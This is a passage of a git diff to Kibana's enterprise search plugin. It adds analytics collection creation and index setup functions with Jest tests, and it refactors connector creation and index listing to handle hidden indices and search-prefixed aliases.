jest.Mock).mockImplementation(() => false); + await expect( + addAnalyticsCollection(mockClient as unknown as IScopedClusterClient, { + name: 'example', + }) + ).rejects.toEqual({ statusCode: 500 }); + expect(setupAnalyticsCollectionIndex).not.toHaveBeenCalled(); + expect(mockClient.asCurrentUser.index).toHaveBeenCalledTimes(1); + }); +}); diff --git a/x-pack/plugins/enterprise_search/server/lib/analytics/add_analytics_collection.ts b/x-pack/plugins/enterprise_search/server/lib/analytics/add_analytics_collection.ts new file mode 100644 index 0000000000000..1cad55a3e884c --- /dev/null +++ b/x-pack/plugins/enterprise_search/server/lib/analytics/add_analytics_collection.ts @@ -0,0 +1,59 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ +import { IScopedClusterClient } from '@kbn/core/server'; + +import { ANALYTICS_COLLECTIONS_INDEX } from '../..'; +import { AnalyticsCollectionDocument, AnalyticsCollection } from '../../../common/types/analytics'; + +import { ErrorCode } from '../../../common/types/error_codes'; + +import { fetchAnalyticsCollectionByName } from './fetch_analytics_collection'; +import { setupAnalyticsCollectionIndex } from './setup_indices'; + +const createAnalyticsCollection = async ( + client: IScopedClusterClient, + document: AnalyticsCollectionDocument +): Promise => { + const analyticsCollection = await fetchAnalyticsCollectionByName(client, document.name); + + if (analyticsCollection) { + throw new Error(ErrorCode.ANALYTICS_COLLECTION_ALREADY_EXISTS); + } + + // index the document + const result = await client.asCurrentUser.index({ + document, + index: ANALYTICS_COLLECTIONS_INDEX, + }); + + await client.asCurrentUser.indices.refresh({ index: ANALYTICS_COLLECTIONS_INDEX }); + + return { + id: result._id, + ...document, + }; +}; + +export const addAnalyticsCollection = async ( + client: IScopedClusterClient, + input: { name: string } +): Promise => { + const document: AnalyticsCollectionDocument = { + event_retention_day_length: 180, + name: input.name, + }; + + const analyticsCollectionIndexExists = await client.asCurrentUser.indices.exists({ + index: ANALYTICS_COLLECTIONS_INDEX, + }); + + if (!analyticsCollectionIndexExists) { + await setupAnalyticsCollectionIndex(client.asCurrentUser); + } + + return await createAnalyticsCollection(client, document); +}; diff --git a/x-pack/plugins/enterprise_search/server/lib/analytics/fetch_analytics_collection.test.ts b/x-pack/plugins/enterprise_search/server/lib/analytics/fetch_analytics_collection.test.ts new file mode 100644 index 0000000000000..e157df1df16f6 --- /dev/null +++ b/x-pack/plugins/enterprise_search/server/lib/analytics/fetch_analytics_collection.test.ts @@ -0,0 +1,103 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +import { IScopedClusterClient } from '@kbn/core-elasticsearch-server'; + +import { ANALYTICS_COLLECTIONS_INDEX } from '../..'; + +import { fetchAnalyticsCollectionByName } from './fetch_analytics_collection'; +import { setupAnalyticsCollectionIndex } from './setup_indices'; + +jest.mock('./setup_indices', () => ({ + setupAnalyticsCollectionIndex: jest.fn(), +})); + +describe('fetch analytics collection lib function', () => { + const mockClient = { + asCurrentUser: { + search: jest.fn(), + }, + asInternalUser: {}, + }; + + beforeEach(() => { + jest.clearAllMocks(); + }); + + describe('fetch collection by name', () => { + it('should fetch analytics collection by name', async () => { + mockClient.asCurrentUser.search.mockImplementationOnce(() => + Promise.resolve({ hits: { hits: [{ _id: 'fakeId', _source: { name: 'example' } }] } }) + ); + + await expect( + fetchAnalyticsCollectionByName(mockClient as unknown as IScopedClusterClient, 'example') + ).resolves.toEqual({ id: 'fakeId', name: 'example' }); + + expect(mockClient.asCurrentUser.search).toHaveBeenCalledWith({ + index: ANALYTICS_COLLECTIONS_INDEX, + query: { + term: { + name: 'example', + }, + }, + }); + }); + + it('should call setup analytics collection index on index not found error', async () => { + mockClient.asCurrentUser.search.mockImplementationOnce(() => + Promise.reject({ + meta: { + body: { + error: { type: 'index_not_found_exception' }, + }, + }, + }) + ); + await expect( + fetchAnalyticsCollectionByName(mockClient as unknown as IScopedClusterClient, 'example') + ).resolves.toEqual(undefined); + expect(mockClient.asCurrentUser.search).toHaveBeenCalledWith({ + index: ANALYTICS_COLLECTIONS_INDEX, + query: { + term: { + name: 'example', + }, + }, + }); + expect(setupAnalyticsCollectionIndex as jest.Mock).toHaveBeenCalledWith( + mockClient.asCurrentUser + ); + }); + + it('should not call setup connectors on other errors', async () => { + mockClient.asCurrentUser.search.mockImplementationOnce(() => + Promise.reject({ + meta: { + body: { + error: { + type: 'other error', + }, + }, + }, + }) + ); + await expect(fetchAnalyticsCollectionByName(mockClient as any, 'example')).resolves.toEqual( + undefined + ); + expect(mockClient.asCurrentUser.search).toHaveBeenCalledWith({ + index: ANALYTICS_COLLECTIONS_INDEX, + query: { + term: { + name: 'example', + }, + }, + }); + expect(setupAnalyticsCollectionIndex as jest.Mock).not.toHaveBeenCalled(); + }); + }); +}); diff --git a/x-pack/plugins/enterprise_search/server/lib/analytics/fetch_analytics_collection.ts b/x-pack/plugins/enterprise_search/server/lib/analytics/fetch_analytics_collection.ts new file mode 100644 index 0000000000000..46f718d23976d --- /dev/null +++ b/x-pack/plugins/enterprise_search/server/lib/analytics/fetch_analytics_collection.ts @@ -0,0 +1,38 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +import { IScopedClusterClient } from '@kbn/core-elasticsearch-server'; + +import { ANALYTICS_COLLECTIONS_INDEX } from '../..'; +import { AnalyticsCollection } from '../../../common/types/analytics'; + +import { isIndexNotFoundException } from '../../utils/identify_exceptions'; + +import { setupAnalyticsCollectionIndex } from './setup_indices'; + +export const fetchAnalyticsCollectionByName = async ( + client: IScopedClusterClient, + name: string +): Promise => { + try { + const searchResults = await client.asCurrentUser.search({ + index: ANALYTICS_COLLECTIONS_INDEX, + query: { term: { name } }, + }); + + const result = searchResults.hits.hits[0]?._source + ? { ...searchResults.hits.hits[0]._source, id: searchResults.hits.hits[0]._id } + : undefined; + + return result; + } catch (error) { + if (isIndexNotFoundException(error)) { + await setupAnalyticsCollectionIndex(client.asCurrentUser); + } + return undefined; + } +}; diff --git a/x-pack/plugins/enterprise_search/server/lib/analytics/setup_indices.test.ts b/x-pack/plugins/enterprise_search/server/lib/analytics/setup_indices.test.ts new file mode 100644 index 0000000000000..ec72d7562b44e --- /dev/null +++ b/x-pack/plugins/enterprise_search/server/lib/analytics/setup_indices.test.ts @@ -0,0 +1,77 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +import { ANALYTICS_VERSION } from '../..'; + +import { setupAnalyticsCollectionIndex } from './setup_indices'; + +describe('setup analytics collection index', () => { + const mockClient = { + asCurrentUser: { + indices: { + create: jest.fn(), + updateAliases: jest.fn(), + }, + }, + asInternalUser: {}, + }; + + beforeEach(() => { + jest.clearAllMocks(); + }); + + it("should create the analytics collection index when it doesn't exist", async () => { + const indexName = '.elastic-analytics-collections'; + const analyticCollectionsMappings = { + _meta: { + version: ANALYTICS_VERSION, + }, + properties: { + event_retention_day_length: { + type: 'long', + }, + name: { + type: 'keyword', + }, + }, + }; + + mockClient.asCurrentUser.indices.create.mockImplementation(() => Promise.resolve()); + mockClient.asCurrentUser.indices.updateAliases.mockImplementation(() => Promise.resolve()); + await expect(setupAnalyticsCollectionIndex(mockClient.asCurrentUser as any)).resolves.toEqual( + undefined + ); + expect(mockClient.asCurrentUser.indices.create).toHaveBeenCalledWith({ + index: `${indexName}-v${1}`, + mappings: analyticCollectionsMappings, + settings: { auto_expand_replicas: '0-3', hidden: true, number_of_replicas: 0 }, + }); + expect(mockClient.asCurrentUser.indices.updateAliases).toHaveBeenCalledWith({ + actions: [ + { + add: { + aliases: [indexName], + index: `${indexName}-v${1}`, + is_hidden: true, + is_write_index: true, + }, + }, + ], + }); + }); + + it('should do nothing if it hits that resource already exists', async () => { + mockClient.asCurrentUser.indices.create.mockImplementation(() => + Promise.reject({ meta: { body: { error: { type: 'resource_already_exists_exception' } } } }) + ); + await expect(setupAnalyticsCollectionIndex(mockClient.asCurrentUser as any)).resolves.toEqual( + undefined + ); + expect(mockClient.asCurrentUser.indices.updateAliases).not.toHaveBeenCalled(); + expect(mockClient.asCurrentUser.indices.create).toHaveBeenCalled(); + }); +}); diff --git a/x-pack/plugins/enterprise_search/server/lib/analytics/setup_indices.ts b/x-pack/plugins/enterprise_search/server/lib/analytics/setup_indices.ts new file mode 100644 index 0000000000000..49a8aaca6f50f --- /dev/null +++ b/x-pack/plugins/enterprise_search/server/lib/analytics/setup_indices.ts @@ -0,0 +1,79 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +import { + IndicesIndexSettings, + MappingProperty, + MappingTypeMapping, +} from '@elastic/elasticsearch/lib/api/types'; +import { ElasticsearchClient } from '@kbn/core-elasticsearch-server'; + +import { ANALYTICS_COLLECTIONS_INDEX, ANALYTICS_VERSION } from '../..'; +import { isResourceAlreadyExistsException } from '../../utils/identify_exceptions'; + +const analyticsCollectionMappingsProperties: Record = { + event_retention_day_length: { + type: 'long', + }, + name: { + type: 'keyword', + }, +}; + +const defaultSettings: IndicesIndexSettings = { + auto_expand_replicas: '0-3', + hidden: true, + number_of_replicas: 0, +}; + +interface IndexDefinition { + aliases: string[]; + mappings: MappingTypeMapping; + name: string; + settings: IndicesIndexSettings; +} + +export const setupAnalyticsCollectionIndex = async (client: ElasticsearchClient) => { + const indexConfiguration: IndexDefinition = { + aliases: [ANALYTICS_COLLECTIONS_INDEX], + mappings: { + _meta: { + version: ANALYTICS_VERSION, + }, + properties: analyticsCollectionMappingsProperties, + }, + name: `${ANALYTICS_COLLECTIONS_INDEX}-v${ANALYTICS_VERSION}`, + settings: defaultSettings, + }; + + try { + const { mappings, aliases, name: index, settings } = indexConfiguration; + await client.indices.create({ + index, + mappings, + settings, + }); + await client.indices.updateAliases({ + actions: [ + { + add: { + aliases, + index, + is_hidden: true, + is_write_index: true, + }, + }, + ], + }); + } catch (error) { + if (isResourceAlreadyExistsException(error)) { + // index already exists, swallow error + return; + } + return error; + } +}; diff --git a/x-pack/plugins/enterprise_search/server/lib/connectors/add_connector.test.ts b/x-pack/plugins/enterprise_search/server/lib/connectors/add_connector.test.ts index ac20e09284185..adb99b98a4226 100644 --- a/x-pack/plugins/enterprise_search/server/lib/connectors/add_connector.test.ts +++ b/x-pack/plugins/enterprise_search/server/lib/connectors/add_connector.test.ts @@ -40,13 +40,20 @@ describe('addConnector lib function', () => { asInternalUser: {}, }; + const createConnectorsIndexExistsFn = + (connectorsIndexExists: boolean, defaultValue: boolean) => + ({ index }: { index: string }) => + index === CONNECTORS_INDEX ? connectorsIndexExists : defaultValue; + beforeEach(() => { jest.clearAllMocks(); }); it('should add connector', async () => { mockClient.asCurrentUser.index.mockImplementation(() => ({ _id: 'fakeId' })); - mockClient.asCurrentUser.indices.exists.mockImplementation(() => false); + mockClient.asCurrentUser.indices.exists.mockImplementation( + createConnectorsIndexExistsFn(true, false) + ); (fetchConnectorByIndexName as jest.Mock).mockImplementation(() => undefined); (fetchCrawlerByIndexName as jest.Mock).mockImplementation(() => undefined); @@ -82,7 +89,9 @@ describe('addConnector lib function', () => { it('should reject if index already exists', async () => { mockClient.asCurrentUser.index.mockImplementation(() => ({ _id: 'fakeId' })); - mockClient.asCurrentUser.indices.exists.mockImplementation(() => true); + mockClient.asCurrentUser.indices.exists.mockImplementation( + createConnectorsIndexExistsFn(true, true) + ); (fetchConnectorByIndexName as jest.Mock).mockImplementation(() => undefined); (fetchCrawlerByIndexName as jest.Mock).mockImplementation(() => undefined); @@ -97,7 +106,9 @@ describe('addConnector lib function', () => { it('should reject if connector already exists', async () => { mockClient.asCurrentUser.index.mockImplementation(() => ({ _id: 'fakeId' })); - mockClient.asCurrentUser.indices.exists.mockImplementation(() => false); + mockClient.asCurrentUser.indices.exists.mockImplementation( + createConnectorsIndexExistsFn(true, false) + ); (fetchConnectorByIndexName as jest.Mock).mockImplementation(() => true); (fetchCrawlerByIndexName as jest.Mock).mockImplementation(() => undefined); @@ -110,9 +121,28 @@ describe('addConnector lib function', () => { expect(mockClient.asCurrentUser.indices.create).not.toHaveBeenCalled(); }); + it('should reject if crawler already exists', async () => { + mockClient.asCurrentUser.index.mockImplementation(() => ({ _id: 'fakeId' })); + mockClient.asCurrentUser.indices.exists.mockImplementation( + createConnectorsIndexExistsFn(true, false) + ); + (fetchConnectorByIndexName as jest.Mock).mockImplementation(() => undefined); + (fetchCrawlerByIndexName as jest.Mock).mockImplementation(() => true); + + await expect( + addConnector(mockClient as unknown as IScopedClusterClient, { + index_name: 'index_name', + language: 'en', + }) + ).rejects.toEqual(new Error(ErrorCode.CRAWLER_ALREADY_EXISTS)); + expect(mockClient.asCurrentUser.indices.create).not.toHaveBeenCalled(); + }); + it('should reject with index already exists if connector and index already exist', async () => { mockClient.asCurrentUser.index.mockImplementation(() => ({ _id: 'fakeId' })); - mockClient.asCurrentUser.indices.exists.mockImplementation(() => true); + mockClient.asCurrentUser.indices.exists.mockImplementation( + createConnectorsIndexExistsFn(true, true) + ); (fetchConnectorByIndexName as jest.Mock).mockImplementation(() => true); (fetchCrawlerByIndexName as jest.Mock).mockImplementation(() => undefined); @@ -127,7 +157,9 @@ describe('addConnector lib function', () => { it('should replace connector if deleteExistingConnector flag is true', async () => { mockClient.asCurrentUser.index.mockImplementation(() => ({ _id: 'fakeId' })); - mockClient.asCurrentUser.indices.exists.mockImplementation(() => false); + mockClient.asCurrentUser.indices.exists.mockImplementation( + createConnectorsIndexExistsFn(true, false) + ); (fetchConnectorByIndexName as jest.Mock).mockImplementation(() => ({ id: 'connectorId' })); (fetchCrawlerByIndexName as jest.Mock).mockImplementation(() => undefined); @@ -167,13 +199,9 @@ describe('addConnector lib function', () => { }); it('should create index if no connectors index exists', async () => { - mockClient.asCurrentUser.index.mockImplementationOnce(() => { - return Promise.reject({ - meta: { body: { error: { type: 'index_not_found_exception' } } }, - statusCode: 404, - }); - }); - mockClient.asCurrentUser.indices.exists.mockImplementation(() => false); + mockClient.asCurrentUser.indices.exists.mockImplementation( + createConnectorsIndexExistsFn(false, false) + ); (fetchConnectorByIndexName as jest.Mock).mockImplementation(() => false); (fetchCrawlerByIndexName as jest.Mock).mockImplementation(() => undefined); await expect( @@ -206,36 +234,4 @@ describe('addConnector lib function', () => { settings: textAnalysisSettings('en'), }); }); - it('should not create index if status code is not 404', async () => { - mockClient.asCurrentUser.index.mockImplementationOnce(() => { - return Promise.reject({ statusCode: 500 }); - }); - mockClient.asCurrentUser.indices.exists.mockImplementation(() => false); - (fetchConnectorByIndexName as jest.Mock).mockImplementation(() => false); - (fetchCrawlerByIndexName as jest.Mock).mockImplementation(() => undefined); - await expect( - addConnector(mockClient as unknown as IScopedClusterClient, { - index_name: 'index_name', - language: 'en', - }) - ).rejects.toEqual({ statusCode: 500 }); - expect(setupConnectorsIndices).not.toHaveBeenCalled(); - expect(mockClient.asCurrentUser.index).toHaveBeenCalledTimes(1); - }); - it('should not create index if crawler exists', async () => { - mockClient.asCurrentUser.index.mockImplementationOnce(() => { - return 'connector '; - }); - mockClient.asCurrentUser.indices.exists.mockImplementation(() => false); - (fetchConnectorByIndexName as jest.Mock).mockImplementation(() => false); - (fetchCrawlerByIndexName as jest.Mock).mockImplementation(() => 'crawler'); - await expect( - addConnector(mockClient as unknown as IScopedClusterClient, { - index_name: 'index_name', - language: 'en', - }) - ).rejects.toEqual(new Error(ErrorCode.CRAWLER_ALREADY_EXISTS)); - expect(setupConnectorsIndices).not.toHaveBeenCalled(); - expect(mockClient.asCurrentUser.index).not.toHaveBeenCalled(); - }); }); diff --git a/x-pack/plugins/enterprise_search/server/lib/connectors/add_connector.ts b/x-pack/plugins/enterprise_search/server/lib/connectors/add_connector.ts index 8528b28582bf0..39a9d562106d0 100644 --- a/x-pack/plugins/enterprise_search/server/lib/connectors/add_connector.ts +++ b/x-pack/plugins/enterprise_search/server/lib/connectors/add_connector.ts @@ -11,7 +11,6 @@ import { CONNECTORS_INDEX } from '../..'; import { ConnectorDocument, ConnectorStatus } from '../../../common/types/connectors'; import { ErrorCode } from '../../../common/types/error_codes'; import { setupConnectorsIndices } from '../../index_management/setup_indices'; -import { isIndexNotFoundException } from '../../utils/identify_exceptions'; import { fetchCrawlerByIndexName } from '../crawler/fetch_crawlers'; import { textAnalysisSettings } from '../indices/text_analysis'; @@ -80,21 +79,11 @@ export const addConnector = async ( status: ConnectorStatus.CREATED, sync_now: false, }; - try { - return await createConnector( - document, - client, - input.language, - !!input.delete_existing_connector - ); - } catch (error) { - if (isIndexNotFoundException(error)) { - // This means .ent-search-connectors index doesn't exist yet - // So we first have to create it, and then try inserting the document again - await setupConnectorsIndices(client.asCurrentUser); - return await createConnector(document, client, input.language, false); - } else { - throw error; - } + const connectorsIndexExists = await client.asCurrentUser.indices.exists({ + index: CONNECTORS_INDEX, + }); + if (!connectorsIndexExists) { + await setupConnectorsIndices(client.asCurrentUser); } + return await createConnector(document, client, input.language, !!input.delete_existing_connector); }; diff --git a/x-pack/plugins/enterprise_search/server/lib/fetch_search_results.test.ts b/x-pack/plugins/enterprise_search/server/lib/fetch_search_results.test.ts index 9c3bb302ca45e..2e3b7a202f153 100644 --- a/x-pack/plugins/enterprise_search/server/lib/fetch_search_results.test.ts +++ b/x-pack/plugins/enterprise_search/server/lib/fetch_search_results.test.ts @@ -87,7 +87,7 @@ describe('fetchSearchResults lib function', () => { expect(mockClient.asCurrentUser.search).toHaveBeenCalledWith({ from: DEFAULT_FROM_VALUE, index: indexName, - q: query, + q: JSON.stringify(query), size: ENTERPRISE_SEARCH_DOCUMENTS_DEFAULT_DOC_COUNT, }); }); @@ -120,7 +120,7 @@ describe('fetchSearchResults lib function', () => { expect(mockClient.asCurrentUser.search).toHaveBeenCalledWith({ from: DEFAULT_FROM_VALUE, index: indexName, - q: query, + q: JSON.stringify(query), size: ENTERPRISE_SEARCH_DOCUMENTS_DEFAULT_DOC_COUNT, }); }); diff --git a/x-pack/plugins/enterprise_search/server/lib/fetch_search_results.ts b/x-pack/plugins/enterprise_search/server/lib/fetch_search_results.ts index d44ef938af98d..b7c3bf81e0ca5 100644 --- a/x-pack/plugins/enterprise_search/server/lib/fetch_search_results.ts +++ b/x-pack/plugins/enterprise_search/server/lib/fetch_search_results.ts @@ -21,7 +21,7 @@ export const fetchSearchResults = async ( from, index: indexName, size, - ...(!!query ? { q: query } : {}), + ...(!!query ? { q: JSON.stringify(query) } : {}), }); return results; }; diff --git a/x-pack/plugins/enterprise_search/server/lib/indices/fetch_indices.test.ts b/x-pack/plugins/enterprise_search/server/lib/indices/fetch_indices.test.ts index d7f7b6185eaa6..1fc8f4cc07186 100644 --- a/x-pack/plugins/enterprise_search/server/lib/indices/fetch_indices.test.ts +++ b/x-pack/plugins/enterprise_search/server/lib/indices/fetch_indices.test.ts @@ -5,6 +5,13 @@ * 2.0. */ +import { + getIndexReturnValue, + mockMultiIndexResponse, + mockMultiStatsResponse, + mockPrivilegesResponse, +} from '../../__mocks__/fetch_indices.mock'; + import { ByteSizeValue } from '@kbn/config-schema'; import { IScopedClusterClient } from '@kbn/core/server'; @@ -13,6 +20,7 @@ import { fetchIndices } from './fetch_indices'; describe('fetchIndices lib function', () => { const mockClient = { asCurrentUser: { + count: jest.fn().mockReturnValue({ count: 100 }), indices: { get: jest.fn(), stats: jest.fn(), @@ -20,7 +28,6 @@ describe('fetchIndices lib function', () => { security: { hasPrivileges: jest.fn(), }, - count: jest.fn().mockReturnValue({ count: 100 }), }, asInternalUser: {}, }; @@ -53,11 +60,11 @@ describe('fetchIndices lib function', () => { mockClient.asCurrentUser.security.hasPrivileges.mockImplementation(() => ({ index: { - 'index-without-prefix': { read: true, manage: true }, - 'search-aliased': { read: true, manage: true }, - 'search-double-aliased': { read: true, manage: true }, - 'search-regular-index': { read: true, manage: true }, - 'second-index': { read: true, manage: true }, + 'index-without-prefix': { manage: true, read: true }, + 'search-aliased': { manage: true, read: true }, + 'search-double-aliased': { manage: true, read: true }, + 'search-regular-index': { manage: true, read: true }, + 'second-index': { manage: true, read: true }, }, })); @@ -76,12 +83,12 @@ describe('fetchIndices lib function', () => { fetchIndices(mockClient as unknown as IScopedClusterClient, 'search-*', false, true) ).resolves.toEqual([ { + alias: false, count: 100, health: 'green', name: 'search-regular-index', + privileges: { manage: true, read: true }, status: 'open', - alias: false, - privileges: { read: true, manage: true }, total: { docs: { count: 100, @@ -125,12 +132,12 @@ describe('fetchIndices lib function', () => { fetchIndices(mockClient as unknown as IScopedClusterClient, 'search-*', true, true) ).resolves.toEqual([ { + alias: false, count: 100, health: 'green', name: 'search-regular-index', + privileges: { manage: true, read: true }, status: 'open', - alias: false, - privileges: { read: true, manage: true }, total: { docs: { count: 100, @@ -368,4 +375,113 @@ describe('fetchIndices lib function', () => { ).resolves.toEqual([]); expect(mockClient.asCurrentUser.indices.stats).not.toHaveBeenCalled(); }); + + describe('alwaysShowSearchPattern', () => { + beforeEach(() => { + mockClient.asCurrentUser.indices.get.mockImplementation(() => mockMultiIndexResponse); + mockClient.asCurrentUser.indices.stats.mockImplementation(() => mockMultiStatsResponse); + + mockClient.asCurrentUser.security.hasPrivileges.mockImplementation(() => ({ + index: mockPrivilegesResponse, + })); + }); + + it('overrides hidden indices setting', async () => { + const returnValue = await fetchIndices( + mockClient as unknown as IScopedClusterClient, + '*', + false, + true, + 'search-' + ); + + // This is the list of mock indices and aliases that are: + // - Non-hidden indices and aliases + // - search- prefixed aliases that point to hidden indices + expect(returnValue).toEqual( + [ + 'regular-index', + 'alias-regular-index', + 'search-alias-regular-index', + 'search-prefixed-regular-index', + 'alias-search-prefixed-regular-index', + 'search-alias-search-prefixed-regular-index', + 'search-alias-hidden-index', + 'search-alias-search-prefixed-hidden-index', + ].map(getIndexReturnValue) + ); + + // This is the list of mock indices and aliases that are: + // - Hidden indices + // - aliases to hidden indices that has no prefix + expect(returnValue).toEqual( + expect.not.arrayContaining( + [ + 'hidden-index', + 'search-prefixed-hidden-index', + 'alias-hidden-index', + 'alias-search-prefixed-hidden-index', + ].map(getIndexReturnValue) + ) + ); + + expect(mockClient.asCurrentUser.indices.get).toHaveBeenCalledWith({ + expand_wildcards: ['hidden', 'all'], + features: ['aliases', 'settings'], + filter_path: ['*.aliases', '*.settings.index.hidden'], + index: '*', + }); + + expect(mockClient.asCurrentUser.indices.stats).toHaveBeenCalledWith({ + expand_wildcards: ['hidden', 'all'], + index: '*', + metric: ['docs', 'store'], + }); + + expect(mockClient.asCurrentUser.security.hasPrivileges).toHaveBeenCalledWith({ + index: [ + { + names: expect.arrayContaining(Object.keys(mockMultiStatsResponse.indices)), + privileges: ['read', 'manage'], + }, + ], + }); + }); + + it('returns everything if hidden indices set', async () => { + const returnValue = await fetchIndices( + mockClient as unknown as IScopedClusterClient, + '*', + true, + true, + 'search-' + ); + + expect(returnValue).toEqual( + expect.arrayContaining(Object.keys(mockMultiStatsResponse.indices).map(getIndexReturnValue)) + ); + + expect(mockClient.asCurrentUser.indices.get).toHaveBeenCalledWith({ + expand_wildcards: ['hidden', 'all'], + features: ['aliases', 'settings'], + filter_path: ['*.aliases', '*.settings.index.hidden'], + index: '*', + }); + + expect(mockClient.asCurrentUser.indices.stats).toHaveBeenCalledWith({ + expand_wildcards: ['hidden', 'all'], + index: '*', + metric: ['docs', 'store'], + }); + + expect(mockClient.asCurrentUser.security.hasPrivileges).toHaveBeenCalledWith({ + index: [ + { + names: expect.arrayContaining(Object.keys(mockMultiStatsResponse.indices)), + privileges: ['read', 'manage'], + }, + ], + }); + }); + }); }); diff --git a/x-pack/plugins/enterprise_search/server/lib/indices/fetch_indices.ts b/x-pack/plugins/enterprise_search/server/lib/indices/fetch_indices.ts index aa2ac7853dc10..28a5373d50ac5 100644 --- a/x-pack/plugins/enterprise_search/server/lib/indices/fetch_indices.ts +++ b/x-pack/plugins/enterprise_search/server/lib/indices/fetch_indices.ts @@ -59,10 +59,13 @@ export const fetchIndices = async ( client: IScopedClusterClient, indexPattern: string, returnHiddenIndices: boolean, - includeAliases: boolean + includeAliases: boolean, + alwaysShowSearchPattern?: 'search-' ): Promise => { // This call retrieves alias and settings information about indices - const expandWildcards: ExpandWildcard[] = returnHiddenIndices ? ['hidden', 'all'] : ['open']; + // If we provide an override pattern with alwaysShowSearchPattern we get everything and filter out hiddens. + const expandWildcards: ExpandWildcard[] = + returnHiddenIndices || alwaysShowSearchPattern ? ['hidden', 'all'] : ['open']; const totalIndices = await client.asCurrentUser.indices.get({ expand_wildcards: expandWildcards, // for better performance only compute aliases and settings of indices but not mappings @@ -73,12 +76,22 @@ export const fetchIndices = async ( index: indexPattern, }); + // Index names that with one of their aliases match with the alwaysShowSearchPattern + const alwaysShowPatternMatches = new Set(); + const indexAndAliasNames = Object.keys(totalIndices).reduce((accum, indexName) => { accum.push(indexName); if (includeAliases) { const aliases = Object.keys(totalIndices[indexName].aliases!); - aliases.forEach((alias) => accum.push(alias)); + aliases.forEach((alias) => { + accum.push(alias); + + // Add indexName to the set if an alias matches the pattern + if (alwaysShowSearchPattern && alias.startsWith(alwaysShowSearchPattern)) { + alwaysShowPatternMatches.add(indexName); + } + }); } return accum; }, [] as string[]); @@ -110,7 +123,36 @@ export const fetchIndices = async ( const indexCounts = await fetchIndexCounts(client, indexAndAliasNames); - return indicesNames + // Index data to show even if they are hidden, set by alwaysShowSearchPattern + const alwaysShowIndices = alwaysShowSearchPattern + ? Array.from(alwaysShowPatternMatches) + .map((indexName: string) => { + const indexData = totalIndices[indexName]; + const indexStats = indicesStats[indexName]; + return mapIndexStats(indexData, indexStats, indexName); + }) + .flatMap(({ name, aliases, ...indexData }) => { + const indicesAndAliases = [] as ElasticsearchIndexWithPrivileges[]; + + if (includeAliases) { + aliases.forEach((alias) => { + if (alias.startsWith(alwaysShowSearchPattern)) { + indicesAndAliases.push({ + alias: true, + count: indexCounts[alias] ?? 0, + name: alias, + privileges: { manage: false, read: false, ...indexPrivileges[name] }, + ...indexData, + }); + } + }); + } + + return indicesAndAliases; + }) + : []; + + const regularIndexData = indicesNames .map((indexName: string) => { const indexData = totalIndices[indexName]; const indexStats = indicesStats[indexName]; @@ -120,30 +162,42 @@ export const fetchIndices = async ( // expand aliases and add to results const indicesAndAliases = [] as ElasticsearchIndexWithPrivileges[]; indicesAndAliases.push({ - name, - count: indexCounts[name] ?? 0, alias: false, - privileges: { read: false, manage: false, ...indexPrivileges[name] }, + count: indexCounts[name] ?? 0, + name, + privileges: { manage: false, read: false, ...indexPrivileges[name] }, ...indexData, }); if (includeAliases) { aliases.forEach((alias) => { indicesAndAliases.push({ - name: alias, - count: indexCounts[alias] ?? 0, alias: true, - privileges: { read: false, manage: false, ...indexPrivileges[name] }, + count: indexCounts[alias] ?? 0, + name: alias, + privileges: { manage: false, read: false, ...indexPrivileges[name] }, ...indexData, }); }); } return indicesAndAliases; - }) - .filter( - ({ name }, index, array) => - // make list of aliases unique since we add an alias per index above - // and aliases can point to multiple indices - array.findIndex((engineData) => engineData.name === name) === index - ); + }); + + const indexNamesAlreadyIncluded = regularIndexData.map(({ name }) => name); + const indexNamesToInclude = alwaysShowIndices + .map(({ name }) => name) + .filter((name) => !indexNamesAlreadyIncluded.includes(name)); + + const itemsToInclude = alwaysShowIndices.filter(({ name }) => indexNamesToInclude.includes(name)); + + const indicesData = alwaysShowSearchPattern + ? ([...regularIndexData, ...itemsToInclude] as ElasticsearchIndexWithPrivileges[]) + : regularIndexData; + + return indicesData.filter( + ({ name }, index, array) => + // make list of aliases unique since we add an alias per index above + // and aliases can point to multiple indices + array.findIndex((engineData) => engineData.name === name) === index + ); }; diff --git a/x-pack/plugins/enterprise_search/server/plugin.ts b/x-pack/plugins/enterprise_search/server/plugin.ts index cfc3d8d196fd9..f9d23af141119 100644 --- a/x-pack/plugins/enterprise_search/server/plugin.ts +++ b/x-pack/plugins/enterprise_search/server/plugin.ts @@ -46,6 +46,7 @@ import { import { registerAppSearchRoutes } from './routes/app_search'; import { registerEnterpriseSearchRoutes } from './routes/enterprise_search'; +import { registerAnalyticsRoutes } from './routes/enterprise_search/analytics'; import { registerConfigDataRoute } from './routes/enterprise_search/config_data'; import { registerConnectorRoutes } from './routes/enterprise_search/connectors'; import { registerCrawlerRoutes } from './routes/enterprise_search/crawler/crawler'; @@ -168,6 +169,7 @@ export class EnterpriseSearchPlugin implements Plugin { // Enterprise Search Routes registerConnectorRoutes(dependencies); registerCrawlerRoutes(dependencies); + registerAnalyticsRoutes(dependencies); getStartServices().then(([, { security: securityStart }]) => { registerCreateAPIKeyRoute(dependencies, securityStart); diff --git a/x-pack/plugins/enterprise_search/server/routes/enterprise_search/analytics.ts b/x-pack/plugins/enterprise_search/server/routes/enterprise_search/analytics.ts new file mode 100644 index 0000000000000..be53b797239a1 --- /dev/null +++ b/x-pack/plugins/enterprise_search/server/routes/enterprise_search/analytics.ts @@ -0,0 +1,51 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +import { schema } from '@kbn/config-schema'; + +import { i18n } from '@kbn/i18n'; + +import { ErrorCode } from '../../../common/types/error_codes'; +import { 